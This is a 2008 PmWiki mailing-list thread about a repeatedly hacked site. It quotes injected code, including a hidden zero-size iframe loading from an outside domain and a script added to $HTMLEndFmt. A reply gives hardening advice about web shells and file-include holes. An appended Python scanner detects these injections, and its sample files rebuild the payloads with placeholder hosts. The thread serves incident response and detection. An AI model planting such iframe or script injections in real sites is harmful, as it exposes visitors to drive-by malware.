[pmwiki-users] More hacking
erik.haa at gmail.com
Wed Sep 3 09:49:07 CDT 2008
- Configuration file is set to allow upload of gif, jpeg, jpg, png,
  htm and html files. I've had a look in the upload directories - and
  for the moment I could not find anything suspicious.
- Include markup is not used.

The pmWiki.php-file is infected with this line:

    $HTMLEndFmt = "\n<script

I don't know how this works, but it seems to write this at the end of
many html and asp files at the site.

2008/9/3 Greg T. Grimes <greg.grimes at msstate.edu>:
> Are these files writeable by the web server? Do you allow uploads to your
> site? Standard security practice says not to allow the web server write
> access to any files on your system. This is especially true for your
> webpages. If you do allow uploads you might want to check your upload
> directory for files that could be used to gain access to your server.
> c99shell is an example. Another thing to look for are file include
> vulnerabilities. For example, if you take input for a form and then use
> that input to include a certain file based on the input this can be used to
> launch scripts that aren't even hosted on your server. I'm currently not
> aware of any File Include Vulns in pmwiki. Just a quick look at the code
> and I don't see any obvious ones.
> On Wed, 3 Sep 2008, Erik Haagensen wrote:
>> Our site has been hacked several times during the last month.
>> It has been cleaned and checked by Site Analyzer - all ok.
>> After some days we have problems again.
>> The index.php (and several other files) contains this now:
>> <?php include('pmwiki.php');
>> <iframe src="http://mixlong.cn/in/" width=0 height=0
>> I don't know what more to do to avoid these problems.
>> Erik Haagensen
>> NO-2550 Os i Østerdalen
> Greg T. Grimes
> Network Analyst
> ITS -- Network Services
> Mississippi State University
NO-2550 Os i Østerdalen
tlf: +47 62497332 / 94430332
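
Added example, not part of the original posts and not PmWiki code: a small Python scanner that walks a web root and flags the three things discussed in this thread, namely a zero-size iframe, a `$HTMLEndFmt` assignment that carries a `<script` tag, and files with loose write permissions. The signature patterns, the extension list, the function names, and the use of group/world write bits as a stand-in for "writable by the web server" are assumptions; the sample files are constructed.

```python
import re
import stat
import tempfile
from pathlib import Path

# Signatures modelled on the two injections quoted in this thread (assumed patterns).
HIDDEN_IFRAME = re.compile(rb"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0(?![\d.])", re.I)
ENDFMT_SCRIPT = re.compile(rb"\$HTMLEndFmt\s*\.?=\s*[\"'][^;]{0,200}<script", re.I)
SCAN_EXT = {".php", ".htm", ".html", ".asp"}  # file types named in the thread


def scan(root):
    """Return (relative_path, finding) pairs for web files under root, in path order."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXT:
            continue
        rel = path.relative_to(root).as_posix()
        data = path.read_bytes()
        if HIDDEN_IFRAME.search(data):
            findings.append((rel, "hidden-iframe"))
        if ENDFMT_SCRIPT.search(data):
            findings.append((rel, "HTMLEndFmt-script"))
        # Assumption: group/other write bits approximate "web server can write here".
        if path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((rel, "group/world-writable"))
    return findings


def demo():
    """Scan a constructed docroot (sample files, not data from the thread)."""
    samples = {
        "index.php": (b"<?php include('pmwiki.php');\n"
                      b'<iframe src="http://example.invalid/in/" width=0 height=0></iframe>\n', 0o644),
        "pmwiki.php": (b'<?php\n$HTMLEndFmt = "\\n<script src=\'http://example.invalid/x.js\'>'
                       b'</script>";\n', 0o666),
        "clean.html": (b'<iframe src="/map" width=400 height=300></iframe>\n', 0o644),
    }
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, (body, mode) in samples.items():
            (root / name).write_bytes(body)
            (root / name).chmod(mode)
        return scan(root)


if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{finding:22} {rel}")
```

A clean scan only means these specific signatures were not found; comparing files against a known-good copy of the PmWiki release catches modifications the patterns miss.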